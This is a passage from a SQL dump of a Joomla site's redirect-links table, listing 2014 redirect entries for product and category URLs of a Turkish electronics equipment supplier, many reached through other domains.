00:00:00',301),(5121,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128&lang=en','','','',1,0,'2014-08-30 18:33:04','0000-00-00 00:00:00',301),(5122,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=0&lang=en','','','',2,0,'2014-08-30 18:51:33','0000-00-00 00:00:00',301),(5123,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',1,0,'2014-08-30 18:59:11','0000-00-00 00:00:00',301),(5124,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',1,0,'2014-08-30 19:13:16','0000-00-00 00:00:00',301),(5125,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=&lang=en','','','',1,0,'2014-08-30 19:50:08','0000-00-00 00:00:00',301),(5126,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=0&lang=tr','','','',2,0,'2014-08-30 20:02:26','0000-00-00 00:00:00',301),(5127,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&lang=en&limitstart=5','','','',2,0,'2014-08-30 20:07:32','0000-00-00 00:00:00',301),(5128,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=&lang=tr','','','',1,0,'2014-08-30 20:47:24','0000-00-00 00:00:00',301),(5129,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129&lang=en','','','',1,0,'2014-08-30 21:30:18','0000-00-00 00:00:00',301),(5130,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=47&Itemid=1&lang=en','','','',3,0,'2014-08-30 22:04:35','0000-00-00 00:00:00',301),(5131,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=en','','','',2,0,'2014-08-30 22:48:29','0000-00-00 00:00:00',301),(5132,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',1,0,'2014-08-30 22:51:48','0000-00-00 00:00:00',301),(5133,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100','','','',8,0,'2014-08-30 23:47:39','0000-00-00 00:00:00',301),(5134,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',3,0,'2014-08-31 00:39:04','0000-00-00 00:00:00',301),(5135,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',1,0,'2014-08-31 01:26:26','0000-00-00 00:00:00',301),(5136,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=174%3Arh61&catid=60%3Aikinciel&Itemid=164&lang=tr','','','',2,0,'2014-08-31 02:20:31','0000-00-00 00:00:00',301),(5137,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-08-31 02:22:37','0000-00-00 00:00:00',301),(5138,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=tr','','','',1,0,'2014-08-31 02:58:06','0000-00-00 00:00:00',301),(5139,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=&lang=en','','','',1,0,'2014-08-31 03:07:28','0000-00-00 00:00:00',301),(5140,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=0&lang=tr','','','',1,0,'2014-08-31 03:10:24','0000-00-00 00:00:00',301),(5141,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-08-31 03:33:19','0000-00-00 00:00:00',301),(5142,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=&lang=tr','','','',1,0,'2014-08-31 03:35:01','0000-00-00 00:00:00',301),(5143,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=&lang=tr','','','',1,0,'2014-08-31 03:52:55','0000-00-00 00:00:00',301),(5144,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=&lang=en','','','',1,0,'2014-08-31 04:00:24','0000-00-00 00:00:00',301),(5145,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-08-31 04:53:02','0000-00-00 00:00:00',301),(5146,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-08-31 04:57:58','0000-00-00 00:00:00',301),(5147,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122&lang=en','','','',1,0,'2014-08-31 05:18:39','0000-00-00 00:00:00',301),(5148,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=tr','','','',1,0,'2014-08-31 05:49:28','0000-00-00 00:00:00',301),(5149,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=tr','','','',1,0,'2014-08-31 06:06:35','0000-00-00 00:00:00',301),(5150,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=0&lang=tr','','','',1,0,'2014-08-31 06:14:26','0000-00-00 00:00:00',301),(5151,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=tr','','','',1,0,'2014-08-31 06:19:32','0000-00-00 00:00:00',301),(5152,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=tr','','','',2,0,'2014-08-31 06:31:55','0000-00-00 00:00:00',301),(5153,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=0&lang=en','','','',1,0,'2014-08-31 06:46:16','0000-00-00 00:00:00',301),(5154,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=0&lang=en','','','',1,0,'2014-08-31 07:49:45','0000-00-00 00:00:00',301),(5155,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',5,0,'2014-08-31 08:17:07','0000-00-00 00:00:00',301),(5156,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117&lang=en','','','',1,0,'2014-08-31 08:27:30','0000-00-00 00:00:00',301),(5157,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=0&lang=en','','','',1,0,'2014-08-31 10:15:08','0000-00-00 00:00:00',301),(5158,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=&lang=en','','','',1,0,'2014-08-31 10:23:17','0000-00-00 00:00:00',301),(5159,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=0&lang=tr','','','',1,0,'2014-08-31 10:24:05','0000-00-00 00:00:00',301),(5160,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=59&amp=&Itemid=&lang=en','','','',14,0,'2014-08-31 10:44:43','0000-00-00 00:00:00',301),(5161,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=59&amp=&Itemid=&lang=tr','','','',14,0,'2014-08-31 10:44:49','0000-00-00 00:00:00',301),(5162,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',34,0,'2014-08-31 10:48:02','0000-00-00 00:00:00',301),(5163,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',33,0,'2014-08-31 10:48:06','0000-00-00 00:00:00',301),(5164,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',33,0,'2014-08-31 10:48:11','0000-00-00 00:00:00',301),(5165,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',33,0,'2014-08-31 10:48:15','0000-00-00 00:00:00',301),(5166,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=&lang=en','','','',1,0,'2014-08-31 11:37:23','0000-00-00 00:00:00',301),(5167,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=0&lang=tr','','','',2,0,'2014-08-31 12:09:41','0000-00-00 00:00:00',301),(5168,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',2,0,'2014-08-31 12:47:00','0000-00-00 00:00:00',301),(5169,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107&lang=en','','','',1,0,'2014-08-31 13:04:29','0000-00-00 00:00:00',301),(5170,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-08-31 13:05:50','0000-00-00 00:00:00',301),(5171,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=&lang=tr','','','',1,0,'2014-08-31 13:13:05','0000-00-00 00:00:00',301),(5172,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=86&Itemid=98&lang=en','','','',1,0,'2014-08-31 13:53:48','0000-00-00 00:00:00',301),(5173,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-08-31 14:56:21','0000-00-00 00:00:00',301),(5174,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=0&lang=tr','','','',1,0,'2014-08-31 15:25:53','0000-00-00 00:00:00',301),(5175,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=0&lang=tr','','','',1,0,'2014-08-31 16:14:41','0000-00-00 00:00:00',301),(5176,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162','','','',3,0,'2014-08-31 16:17:37','0000-00-00 00:00:00',301),(5177,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162','','','',1,0,'2014-08-31 16:21:14','0000-00-00 00:00:00',301),(5178,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=0&lang=tr','','','',1,0,'2014-08-31 16:34:07','0000-00-00 00:00:00',301),(5179,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=0&lang=tr','','','',1,0,'2014-08-31 16:51:50','0000-00-00 00:00:00',301),(5180,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=0&lang=tr','','','',1,0,'2014-08-31 17:05:12','0000-00-00 00:00:00',301),(5181,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-08-31 17:11:12','0000-00-00 00:00:00',301),(5182,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',2,0,'2014-08-31 17:11:57','0000-00-00 00:00:00',301),(5183,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-08-31 17:32:27','0000-00-00 00:00:00',301),(5184,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=0&lang=tr','','','',1,0,'2014-08-31 17:43:56','0000-00-00 00:00:00',301),(5185,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=0&lang=tr','','','',1,0,'2014-08-31 17:46:41','0000-00-00 00:00:00',301),(5186,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108&lang=en','','','',1,0,'2014-08-31 18:08:40','0000-00-00 00:00:00',301),(5187,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=0&lang=tr','','','',2,0,'2014-08-31 18:17:28','0000-00-00 00:00:00',301),(5188,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=0&lang=tr','','','',1,0,'2014-08-31 18:36:28','0000-00-00 00:00:00',301),(5189,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=&lang=en','','','',6,0,'2014-08-31 18:59:02','0000-00-00 00:00:00',301),(5190,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-08-31 19:03:03','0000-00-00 00:00:00',301),(5191,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=&lang=en','','','',1,0,'2014-08-31 19:19:40','0000-00-00 00:00:00',301),(5192,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=0&lang=en','','','',1,0,'2014-08-31 19:20:19','0000-00-00 00:00:00',301),(5193,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=tr','','','',6,0,'2014-08-31 19:28:17','0000-00-00 00:00:00',301),(5194,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=0&lang=tr','','','',1,0,'2014-08-31 20:08:54','0000-00-00 00:00:00',301),(5195,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',1,0,'2014-08-31 20:10:10','0000-00-00 00:00:00',301),(5196,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160','','','',1,0,'2014-08-31 20:13:23','0000-00-00 00:00:00',301),(5197,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',2,0,'2014-08-31 20:48:24','0000-00-00 00:00:00',301),(5198,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=0&lang=en','','','',1,0,'2014-08-31 21:05:18','0000-00-00 00:00:00',301),(5199,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=51%3Aneo&Itemid=92&layout=default&lang=tr','','','',2,0,'2014-08-31 21:32:54','0000-00-00 00:00:00',301),(5200,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=0&lang=tr','','','',1,0,'2014-08-31 22:01:51','0000-00-00 00:00:00',301),(5201,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en','','','',1,0,'2014-08-31 22:01:58','0000-00-00 00:00:00',301),(5202,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=&lang=en','','','',1,0,'2014-08-31 22:09:32','0000-00-00 00:00:00',301),(5203,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-08-31 22:11:16','0000-00-00 00:00:00',301),(5204,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=&lang=en','','','',1,0,'2014-08-31 22:57:48','0000-00-00 00:00:00',301),(5205,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=&lang=tr','','','',1,0,'2014-08-31 23:06:31','0000-00-00 00:00:00',301);
INSERT INTO `fz6t4_redirect_links` VALUES (5206,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=&lang=tr','','','',1,0,'2014-08-31 23:15:26','0000-00-00 00:00:00',301),(5207,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=tr','','','',30,0,'2014-08-31 23:15:27','0000-00-00 00:00:00',301),(5208,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-08-31 23:35:46','0000-00-00 00:00:00',301),(5209,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58','','','',1,0,'2014-08-31 23:40:27','0000-00-00 00:00:00',301),(5210,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=&lang=tr','','','',1,0,'2014-08-31 23:41:46','0000-00-00 00:00:00',301),(5211,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=0&lang=tr','','','',1,0,'2014-09-01 01:18:13','0000-00-00 00:00:00',301),(5212,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=tr','','','',2,0,'2014-09-01 01:42:24','0000-00-00 00:00:00',301),(5213,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=0&lang=en','','','',1,0,'2014-09-01 02:40:12','0000-00-00 00:00:00',301),(5214,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=&lang=tr','','','',1,0,'2014-09-01 03:09:40','0000-00-00 00:00:00',301),(5215,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=tr','','','',6,0,'2014-09-01 03:14:13','0000-00-00 00:00:00',301),(5216,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&lang=en&Itemid=','','','',1,0,'2014-09-01 03:15:04','0000-00-00 00:00:00',301),(5217,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',1,0,'2014-09-01 03:23:26','0000-00-00 00:00:00',301),(5218,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50','','','',1,0,'2014-09-01 04:01:50','0000-00-00 00:00:00',301),(5219,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=0&lang=en','','','',1,0,'2014-09-01 04:18:13','0000-00-00 00:00:00',301),(5220,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=0&lang=en','','','',1,0,'2014-09-01 05:16:23','0000-00-00 00:00:00',301),(5221,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=40&Itemid=0&lang=en','','','',1,0,'2014-09-01 05:25:48','0000-00-00 00:00:00',301),(5222,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=0&lang=tr','','','',1,0,'2014-09-01 06:44:45','0000-00-00 00:00:00',301),(5223,'http://www.3s-technologies.com.tr/index.php/en/images/stories/barner.gif','','','',1,0,'2014-09-01 07:59:57','0000-00-00 00:00:00',301),(5224,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=&lang=tr','','','',1,0,'2014-09-01 08:20:57','0000-00-00 00:00:00',301),(5225,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=&lang=tr','','','',1,0,'2014-09-01 09:02:10','0000-00-00 00:00:00',301),(5226,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',37,0,'2014-09-01 09:08:17','0000-00-00 00:00:00',301),(5227,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',31,0,'2014-09-01 09:22:45','0000-00-00 00:00:00',301),(5228,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',31,0,'2014-09-01 09:23:01','0000-00-00 00:00:00',301),(5229,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=0&lang=en','','','',1,0,'2014-09-01 10:27:31','0000-00-00 00:00:00',301),(5230,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=59&Itemid=0&lang=tr','','','',1,0,'2014-09-01 11:04:19','0000-00-00 00:00:00',301),(5231,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=&lang=tr','','','',1,0,'2014-09-01 11:28:47','0000-00-00 00:00:00',301),(5232,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=0&lang=tr','','','',1,0,'2014-09-01 11:54:30','0000-00-00 00:00:00',301),(5233,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50','','','',1,0,'2014-09-01 12:41:43','0000-00-00 00:00:00',301),(5234,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=0&lang=en','','','',1,0,'2014-09-01 13:10:05','0000-00-00 00:00:00',301),(5235,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=0&lang=en','','','',1,0,'2014-09-01 13:16:57','0000-00-00 00:00:00',301),(5236,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-09-01 13:18:59','0000-00-00 00:00:00',301),(5237,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128&lang=tr','','','',2,0,'2014-09-01 13:50:33','0000-00-00 00:00:00',301),(5238,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=0&lang=en','','','',1,0,'2014-09-01 14:37:49','0000-00-00 00:00:00',301),(5239,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=59&Itemid=&lang=tr','','','',1,0,'2014-09-01 15:00:12','0000-00-00 00:00:00',301),(5240,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=en','','','',34,0,'2014-09-01 15:21:05','0000-00-00 00:00:00',301),(5241,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=en','','','',37,0,'2014-09-01 15:21:16','0000-00-00 00:00:00',301),(5242,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=168&Itemid=58&lang=tr','','','',41,0,'2014-09-01 15:21:51','0000-00-00 00:00:00',301),(5243,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=en','','','',40,0,'2014-09-01 15:22:12','0000-00-00 00:00:00',301),(5244,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',40,0,'2014-09-01 15:29:26','0000-00-00 00:00:00',301),(5245,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',40,0,'2014-09-01 15:29:36','0000-00-00 00:00:00',301),(5246,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=0&lang=en','','','',1,0,'2014-09-01 16:29:43','0000-00-00 00:00:00',301),(5247,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162&lang=tr','','','',2,0,'2014-09-01 16:50:12','0000-00-00 00:00:00',301),(5248,'http://www.3s-technologies.com.tr/index.php/en/Search...','','http://www.3s-technologies.com.tr/','',1,0,'2014-09-01 17:05:36','0000-00-00 00:00:00',301),(5249,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',2,0,'2014-09-01 17:31:37','0000-00-00 00:00:00',301),(5250,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=&lang=tr','','','',1,0,'2014-09-01 17:33:59','0000-00-00 00:00:00',301),(5251,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',2,0,'2014-09-01 17:47:32','0000-00-00 00:00:00',301),(5252,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=86&Itemid=98&lang=en','','','',2,0,'2014-09-01 17:57:07','0000-00-00 00:00:00',301),(5253,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',2,0,'2014-09-01 18:22:35','0000-00-00 00:00:00',301),(5254,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138&lang=en','','','',2,0,'2014-09-01 18:25:46','0000-00-00 00:00:00',301),(5255,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=&lang=tr','','','',1,0,'2014-09-01 18:29:24','0000-00-00 00:00:00',301),(5256,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=tr','','','',2,0,'2014-09-01 18:35:19','0000-00-00 00:00:00',301),(5257,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153&lang=tr','','','',2,0,'2014-09-01 18:41:43','0000-00-00 00:00:00',301),(5258,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',2,0,'2014-09-01 19:11:31','0000-00-00 00:00:00',301),(5259,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=0&lang=en','','','',1,0,'2014-09-01 19:11:43','0000-00-00 00:00:00',301),(5260,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159&lang=en','','','',2,0,'2014-09-01 19:52:06','0000-00-00 